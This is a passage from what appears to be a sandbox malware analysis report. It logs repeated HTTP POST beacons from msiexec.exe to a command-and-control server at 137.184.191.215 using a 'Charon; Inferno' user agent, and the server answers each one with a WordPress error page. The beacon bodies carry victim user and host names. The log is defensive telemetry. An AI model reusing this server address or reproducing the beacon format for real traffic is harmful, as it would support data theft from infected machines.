3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                Sep 30, 2024 10:04:39.113107920 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                Sep 30, 2024 10:04:39.113146067 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                22192.168.2.449763137.184.191.21580416C:\Windows\SysWOW64\msiexec.exe
                                TimestampBytes transferredDirectionData
                                Sep 30, 2024 10:04:39.357562065 CEST241OUTPOST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:04:39.362493992 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:04:41.940439939 CEST1236INHTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:04:39 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                Sep 30, 2024 10:04:41.940453053 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                Sep 30, 2024 10:04:41.940459013 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                23192.168.2.449764137.184.191.21580416C:\Windows\SysWOW64\msiexec.exe
                                TimestampBytes transferredDirectionData
                                Sep 30, 2024 10:04:42.104583025 CEST241OUTPOST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:04:42.109431028 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:04:44.759974957 CEST1236INHTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:04:42 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                Sep 30, 2024 10:04:44.759998083 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                                Sep 30, 2024 10:04:44.760010004 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                                Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                                Sep 30, 2024 10:04:44.760020971 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                                Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                24192.168.2.449765137.184.191.21580416C:\Windows\SysWOW64\msiexec.exe
                                TimestampBytes transferredDirectionData
                                Sep 30, 2024 10:04:44.916829109 CEST241OUTPOST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:04:44.921691895 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:04:47.588433981 CEST1236INHTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:04:45 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                Sep 30, 2024 10:04:47.588480949 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                                Sep 30, 2024 10:04:47.588502884 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                                Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                                Sep 30, 2024 10:04:47.588536024 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                                Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                25192.168.2.449766137.184.191.21580416C:\Windows\SysWOW64\msiexec.exe
                                TimestampBytes transferredDirectionData
                                Sep 30, 2024 10:04:47.745021105 CEST241OUTPOST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:04:47.749965906 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:04:50.391940117 CEST1236INHTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:04:48 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                Sep 30, 2024 10:04:50.391962051 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                Sep 30, 2024 10:04:50.391974926 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                26192.168.2.449767137.184.191.21580416C:\Windows\SysWOW64\msiexec.exe
                                TimestampBytes transferredDirectionData
                                Sep 30, 2024 10:04:50.542316914 CEST241OUTPOST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:04:50.551239014 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:04:53.167238951 CEST1236INHTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:04:51 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                Sep 30, 2024 10:04:53.167262077 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                Sep 30, 2024 10:04:53.167319059 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                27192.168.2.449768137.184.191.21580416C:\Windows\SysWOW64\msiexec.exe
                                TimestampBytes transferredDirectionData
                                Sep 30, 2024 10:04:53.316770077 CEST241OUTPOST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
